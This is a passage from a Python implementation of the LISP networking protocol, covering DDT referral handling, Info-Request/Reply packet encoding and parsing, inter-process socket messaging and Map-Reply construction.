self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (self.nonce in lisp_ddt_map_requestQ):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix with
# EID-prefix-AFI set to 0. EID appened below follows with hostname
# or AFI=0:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | <hostname--null-terminated> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info(object):
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
# Zero out key-id, auth-data-len, ttl, reserved, eid-mask-len, and
# eid-prefix-afi.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17.
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += (self.hostname + "\0").encode()
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info(object):
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source(object):
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert to binascii by byte-swapping and zero filling
# longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#endif
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
# Returns a byte string.
#
def lisp_packet_ipc(packet, source, sport):
header = "packet@{}@{}@{}@".format(str(len(packet)), source, str(sport))
return(header.encode() + packet)
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be source from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
# Returns a byte string.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
header = "control-packet@{}@{}@".format(dest, str(dport))
return(header.encode() + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
# Returns a byte string.
#
def lisp_data_packet_ipc(packet, source):
header = "data-packet@{}@{}@@".format(str(len(packet)), source)
return(header.encode() + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
# Returns a byte string. Variable "ipc" is a string.
#
def lisp_command_ipc(ipc, source):
packet = "command@{}@{}@@".format(len(ipc), source) + ipc
return(packet.encode())
#enddef
#
# lisp_api_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
# Returns a byte string. Variable "data" is a string.
#
def lisp_api_ipc(source, data):
packet = "api@" + str(len(data)) + "@" + source + "@@" + data
return(packet.encode())
#enddef
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in 15000 byte segments since the socket interface will not allow
# to support more. And socket.setsockopt() won't alow to increase SO_SNDBUF.
#
# Variable "packet" is of type byte string. Caller must adhere. Since packet
# is going out a socket interface (even if internal).
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find(b"control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
if (type(segment) == str): segment = segment.encode()
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error as e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump. Returns string
# and not byte string like supplied "packet" type.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = b""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + b" "
offset += 8
length -= 4
#endfor
return(new.decode())
#enddef
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# Send on socket.
#
try:
lisp_socket.sendto(packet, (address, port))
except socket.error as e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
return
#enddef
#
# lisp_receive_segments
#
# Process 1500 byte segments if received IPC packet greater than what sockets
# can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length. We only have one
# segment which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
seg = segment.decode()
if (seg.find("packet@") == 0):
seg = seg.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look at array elements with index 2 and above. Caller
# passes a byte string.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = b""
for segment in payload: packet += segment + b"\x40"
return(packet[:-1])
#enddef
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did it so it is assebled into a complete datagram
# in this sytem.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
if (type(data) == str): data = data.encode()
loop = False
while (assembled == False):
data = data.split(b"@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0].decode()
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2].decode()
port = data[3].decode()
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we will confuse the IPC separator from real data.
# So go to the payload and put in 0x40 where split() seperated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(b" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command.decode() + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
timestamp = time.time()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl, timestamp)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
elif (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
elif (lisp_is_running("lisp-itr")):
lisp_process_unicast_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl, timestamp):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, map_request,
keys, enc, auth, mr_ttl=-1):
rloc_probe = map_request.rloc_probe if (map_request != None) else False
json_telemetry = map_request.json_telemetry if (map_request != None) else \
None
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
if (json_telemetry != None): eid_record.rloc_count += 1
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
probing_rloc = None
for rloc_entry in rloc_set:
multicast = rloc_entry.rloc.is_multicast_address()
rloc_record = lisp_rloc_record()
probe_bit = rloc_probe and (multicast or json_telemetry == None)
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs or multicast):
rloc_record.local_bit = True
rloc_record.probe_bit = probe_bit
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
if (probing_rloc == None):
if (rloc_entry.translated_rloc.is_null()):
probing_rloc = rloc_entry.rloc
else:
probing_rloc = rloc_entry.translated_rloc
#endif
#endif
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
#
# Add etr-out-ts if telemetry data was present in Map-Request.
#
if (json_telemetry != None):
rloc_record = lisp_rloc_record()
if (probing_rloc): rloc_record.rloc.copy_address(probing_rloc)
rloc_record.local_bit = True
rloc_record.probe_bit = True
rloc_record.reach_bit = True
if (lisp_i_am_rtr):
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
#endif
js = lisp_encode_telemetry(json_telemetry, eo=str(time.time()))
rloc_record.json = lisp_json("telemetry", js)
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endif
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
